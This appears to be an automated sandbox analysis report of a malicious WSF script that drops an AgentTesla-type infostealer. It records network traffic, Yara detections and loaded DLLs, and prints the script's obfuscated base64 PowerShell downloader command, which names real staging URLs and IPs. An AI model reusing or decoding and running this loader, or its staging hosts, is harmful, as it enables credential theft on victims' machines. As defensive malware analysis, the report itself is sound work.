Windows Analysis Report
rdevuelto_Pagos.wsf

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: paste.ee

Yara detected Generic Downloader

Source: Yara match

File source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /images/004/739/228/original/new_image_wsf.jpg?1707826743 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /base64droid.txt HTTP/1.1Host: 172.245.214.91Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 172.245.214.91 172.245.214.91
Source: Joe Sandbox View	IP Address: 45.74.19.84 45.74.19.84

Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: HVC-ASUS HVC-ASUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown

DNS query: name: ip-api.com

Source: global traffic	HTTP traffic detected: GET /d/SDfNF HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
Source: global traffic	HTTP traffic detected: GET /d/SDfNF HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee

Source: unknown	TCP traffic detected without corresponding DNS query: 45.74.19.84
Source: unknown	TCP traffic detected without corresponding DNS query: 45.74.19.84
Source: unknown	TCP traffic detected without corresponding DNS query: 45.74.19.84
Source: unknown	TCP traffic detected without corresponding DNS query: 45.74.19.84
Source: unknown	TCP traffic detected without corresponding DNS query: 45.74.19.84
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.214.91

Source: global traffic	HTTP traffic detected: GET /d/SDfNF HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
Source: global traffic	HTTP traffic detected: GET /images/004/739/228/original/new_image_wsf.jpg?1707826743 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /d/SDfNF HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
Source: global traffic	HTTP traffic detected: GET /base64droid.txt HTTP/1.1Host: 172.245.214.91Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: paste.ee

Source: powershell.exe, 00000004.00000002.2435469056.0000020D2B733000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.74.19.84
Source: powershell.exe, 00000004.00000002.2430800998.0000020D2952A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.74.19.84/xampp/bkp/new_image_wsf.jpg
Source: powershell.exe, 00000002.00000002.2753314836.000001D6C0880000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: AddInProcess32.exe, 00000008.00000002.3367046963.00000000029BA000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.3367046963.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.3367046963.00000000028E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: AddInProcess32.exe, 00000008.00000002.3367046963.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.3367046963.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.3359661563.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: wscript.exe, 00000000.00000003.2124444214.000001E596697000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125416320.000001E596698000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://paste.ee/d/SDf
Source: wscript.exe, 00000000.00000002.2125416320.000001E596698000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2119500902.000001E598162000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2124421923.000001E59669C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125478626.000001E59669D000.00000004.00000020.00020000.00000000.sdmp, rdevuelto_Pagos.wsf	String found in binary or memory: http://paste.ee/d/SDfNF
Source: powershell.exe, 00000004.00000002.2435469056.0000020D2B733000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2710395460.000001D6A87BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2435469056.0000020D2B511000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.3367046963.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.3367046963.00000000028E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2435469056.0000020D2B733000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: AddInProcess32.exe, 00000008.00000002.3359661563.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: powershell.exe, 00000002.00000002.2710395460.000001D6A876E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000002.00000002.2710395460.000001D6A878B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2435469056.0000020D2B511000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: wscript.exe, 00000000.00000003.2122394603.000001E59637A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125355839.000001E5963BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee
Source: wscript.exe, 00000000.00000003.2122394603.000001E59637A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125355839.000001E5963BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee;
Source: wscript.exe, 00000000.00000003.2122394603.000001E59637A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125355839.000001E5963BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com
Source: wscript.exe, 00000000.00000003.2122394603.000001E59637A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125355839.000001E5963BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com;
Source: wscript.exe, 00000000.00000003.2122394603.000001E59637A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125355839.000001E5963BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com
Source: wscript.exe, 00000000.00000003.2122394603.000001E59637A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125355839.000001E5963BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com;
Source: powershell.exe, 00000004.00000002.2435469056.0000020D2B733000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: wscript.exe, 00000000.00000003.2122394603.000001E596363000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125290537.000001E596364000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123509518.000001E596363000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/?
Source: wscript.exe, 00000000.00000003.2122394603.000001E596363000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125290537.000001E596364000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123509518.000001E596363000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/SDfNF
Source: wscript.exe, 00000000.00000003.2122394603.000001E596363000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125290537.000001E596364000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123509518.000001E596363000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/SDfNFPh
Source: wscript.exe, 00000000.00000003.2122394603.000001E596363000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125290537.000001E596364000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123509518.000001E596363000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/SDfNFS
Source: wscript.exe, 00000000.00000003.2122531094.000001E596345000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125207821.000001E596345000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee:443/d/SDfNF
Source: wscript.exe, 00000000.00000003.2122394603.000001E59637A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125355839.000001E5963BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.gravatar.com
Source: wscript.exe, 00000000.00000003.2122394603.000001E59637A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125355839.000001E5963BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://themes.googleusercontent.com
Source: powershell.exe, 00000004.00000002.2435469056.0000020D2B8E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br
Source: powershell.exe, 00000004.00000002.2430800998.0000020D2952A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/004/739/228/original/new_image_wsf.jpg?1707826743
Source: wscript.exe, 00000000.00000003.2122394603.000001E59637A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125355839.000001E5963BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: wscript.exe, 00000000.00000003.2122394603.000001E59637A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125355839.000001E5963BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com;
Source: wscript.exe, 00000000.00000003.2122394603.000001E59637A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125355839.000001E5963BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.215.45:443 -> 192.168.2.6:49722 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6136, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2992, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 8436
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 8436			Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDkDgTreLwDgTreyDgTreDIDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredwBzDgTreGYDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrewDgTreDcDgTreODgTreDgTreyDgTreDYDgTreNwDgTre0DgTreDMDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreDoDgTreLwDgTrevDgTreDQDgTreNQDgTreuDgTreDcDgTreNDgTreDgTreuDgTreDEDgTreOQDgTreuDgTreDgDgTreNDgTreDgTrevDgTreHgDgTreYQBtDgTreHDgTreDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreXwB3DgTreHMDgTreZgDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreH
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDkDgTreLwDgTreyDgTreDIDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredwBzDgTreGYDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrewDgTreDcDgTreODgTreDgTreyDgTreDYDgTreNwDgTre0DgTreDMDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreDoDgTreLwDgTrevDgTreDQDgTreNQDgTreuDgTreDcDgTreNDgTreDgTreuDgTreDEDgTreOQDgTreuDgTreDgDgTreNDgTreDgTrevDgTreHgDgTreYQBtDgTreHDgTreDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreXwB3DgTreHMDgTreZgDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreH			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_00E6A358	8_2_00E6A358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_00E64AA0	8_2_00E64AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_00E6AB10	8_2_00E6AB10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_00E63E88	8_2_00E63E88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_00E641D0	8_2_00E641D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_06234200	8_2_06234200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_06232348	8_2_06232348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_062359A8	8_2_062359A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_06230040	8_2_06230040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_062352C0	8_2_062352C0

Source: rdevuelto_Pagos.wsf

Initial sample: Strings found which are bigger than 50

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
